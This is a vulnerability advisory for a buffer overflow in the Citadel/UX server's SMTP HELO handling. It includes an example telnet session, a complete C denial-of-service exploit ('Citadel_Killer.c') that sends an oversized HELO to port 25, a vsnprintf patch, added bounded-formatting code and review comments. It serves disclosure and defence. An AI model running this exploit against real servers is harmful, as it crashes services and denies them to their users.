Citadel/UX Server Remote DoS attack Vulnerability

What is Citadel/UX:

Citadel/UX is an advanced client/server BBS program 
for operating highly interactive sites, both on the 
Internet and over dialup. Users can connect to 
Citadel/UX using any of telnet, WWW, or client 
software. Among the features supported are public 
and private message bases (rooms), electronic mail, 
real-time chat, paging, etc. The server is 
multithreaded and can easily support a large number 
of concurrent users. In addition, SMTP and POP3 
servers are built-in for easy connection to Internet 
mail. Citadel/UX is both robust and mature, having 
been developed over the course of the past twelve 
years.

Problem:
I have found a buffer overflow in the Citadel/UX server. 
An attacker can execute a denial of service attack 
against it. Once the big buffer has been sent, the 
server is vulnerable.

Example:
[xperc@security citadel]$telnet 192.168.0.3 25
Trying 192.168.0.3...
Connected to 192.168.0.3.
Escape character is '^]'.
220 security ESMTP Citadel/UX server ready.
helo [buffer]


[buffer] is around 4096 characters. 
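
The patch at the end of this advisory replaces an unbounded vsprintf() into a 4096-byte buffer. As an added example (not code from the advisory or from Citadel/UX), the C below shows that bounded pattern with truncation detection, run on constructed HELO arguments like the [buffer] in the session above; the names fmt_bounded and helo_status and the "SMTP: helo %s" format are assumptions.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define LOG_BUF 4096            /* same size as buf[] in the patched function */
static char line[LOG_BUF];      /* destination for the formatted log entry */

/* Bounded formatter (hypothetical name). Returns 0 if the message fit,
 * 1 if it was cut to fit, -1 on a formatting error. dst is always
 * NUL-terminated. Relies on C99 vsnprintf(), which returns the length the
 * full message would have had. */
static int fmt_bounded(char *dst, size_t dstsz, const char *format, ...)
{
    static const char mark[] = "[truncated]";
    va_list ap;
    int n;
    if (dstsz == 0)
        return -1;
    va_start(ap, format);
    n = vsnprintf(dst, dstsz, format, ap);
    va_end(ap);
    dst[dstsz - 1] = '\0';
    if (n < 0)
        return -1;
    if ((size_t)n < dstsz)
        return 0;
    if (dstsz > sizeof(mark))   /* make the cut visible to whoever reads the log */
        memcpy(dst + dstsz - sizeof(mark), mark, sizeof(mark));
    return 1;
}

/* Constructed input: log a HELO whose argument is arg_len 'a' characters.
 * Returns fmt_bounded()'s status; the entry is left in line[]. */
static int helo_status(size_t arg_len)
{
    static char arg[8192];
    if (arg_len >= sizeof(arg))
        arg_len = sizeof(arg) - 1;
    memset(arg, 'a', arg_len);
    arg[arg_len] = '\0';
    return fmt_bounded(line, sizeof(line), "SMTP: helo %s", arg);
}

int main(void)
{
    int rc = helo_status(8000);
    printf("8000-char helo: status %d, %zu bytes logged\n", rc, strlen(line));
    return 0;
}
```

A status of 1 is also a useful detection signal: a HELO argument large enough to fill a 4096-byte log buffer is worth alerting on.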


/* Citadel_Killer.c
 *
 * Remote Denial of Service Citadel/UX Server.  
 * 
 *		by xperc@hotmail.com
 */
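#include <stdio.h>
#include <stdlib.h>	/* exit */
#include <string.h>	/* memset, strcat, strlen */
#include <unistd.h>	/* close */
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>	/* inet_addr */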

#define MAXBUF 		8000 
#define MAXBUF2		MAXBUF+6
#define RECVBUF		256
#define CIT_SMTP	25	

int main(int argc, char *argv[])
{
	int sockfd;
	char msg[RECVBUF],buf[MAXBUF],sendbuf[MAXBUF2];
	struct sockaddr_in target;

	if(argc!=2){
		fprintf(stderr,"Usage: %s target_address\n",*argv);
		exit(-1);
	}
	if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0){
		perror("socket");
		exit(-1);
	}
	target.sin_family=AF_INET;
	target.sin_port=htons(CIT_SMTP);
	target.sin_addr.s_addr=inet_addr(argv[1]);
	if(connect(sockfd,(struct sockaddr*)&target,sizeof(target))<0){
		perror("connect");
		exit(-1);	
	}
	if(recv(sockfd,msg,sizeof(msg)-1,0)<=0){
		perror("recv");
		exit(-1);
	}

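	/* fill buf with 'a' and terminate it so %s stops inside buf
	 * and the trailing newline still fits in sendbuf */
	memset(buf,'a',MAXBUF-1);
	buf[MAXBUF-1]='\0';
	snprintf(sendbuf,sizeof(sendbuf),"helo %s",buf);
	strcat(sendbuf,"\n");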

	send(sockfd,sendbuf,strlen(sendbuf),0);
	close(sockfd);

	return 0;
}

Patch for this Vulnerability:
--- citadel-old/sysdep.c	Sat Dec  8 12:31:44 
2001
+++ citadel/sysdep.c	Sat Mar  9 05:51:11 
2002
@@ -106,7 +106,7 @@
 	char buf[4096];
   
         va_start(arg_ptr, format);   
-        vsprintf(buf, format, arg_ptr);   
+        vsnprintf(buf, sizeof(buf), format, arg_ptr);   
         va_end(arg_ptr);   
 
 	if (loglevel <= verbosity) { 
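
Review bot: the return value of vsnprintf() on the + line is discarded, so a message longer than sizeof(buf) is cut silently and the log entry gives no sign that an oversized request arrived. Capture the result and, when it is negative or >= sizeof(buf), record that the entry was truncated; setting buf[sizeof(buf) - 1] = '\0' after the call also covers C libraries whose vsnprintf() predates C99 and may not terminate on truncation. The hunk bounds only the copy into buf[4096]; the code that accepts the command line is not visible here, so a length limit at the point of input should be checked separately.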
